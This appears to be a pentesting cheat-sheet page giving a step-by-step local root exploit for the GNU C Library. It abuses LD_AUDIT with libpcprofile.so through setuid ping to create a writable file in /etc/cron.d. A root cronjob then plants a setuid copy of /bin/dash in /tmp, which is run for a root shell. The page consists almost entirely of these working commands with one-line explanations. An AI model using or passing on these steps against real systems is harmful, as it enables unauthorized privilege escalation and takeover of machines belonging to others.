GNU C Library
ldd --version
GNU C Library 2.x (libc6)
GNU C Library 2.x (libc6) has a privesc exploit:
Enumeration
ldd --version
Exploitation
Step 1: The creation mask is inherited by children, and survives even a setuid execve. Therefore, we can influence how files are created during exploitation.
umask 0
Step 2: libpcprofile is distributed with the libc package.
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
Step 3: We identified one of the pcprofile constructors is unsafe to run with elevated privileges, as it creates the file specified in the output environment variable.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ls -l /etc/cron.d/exploit
Step 4: Setup a cronjob to give us privileges.
printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
ls -l /tmp/exploit
Step 5: Trigger the exploit and get a root shell.
/tmp/exploit
Last updated
Was this helpful?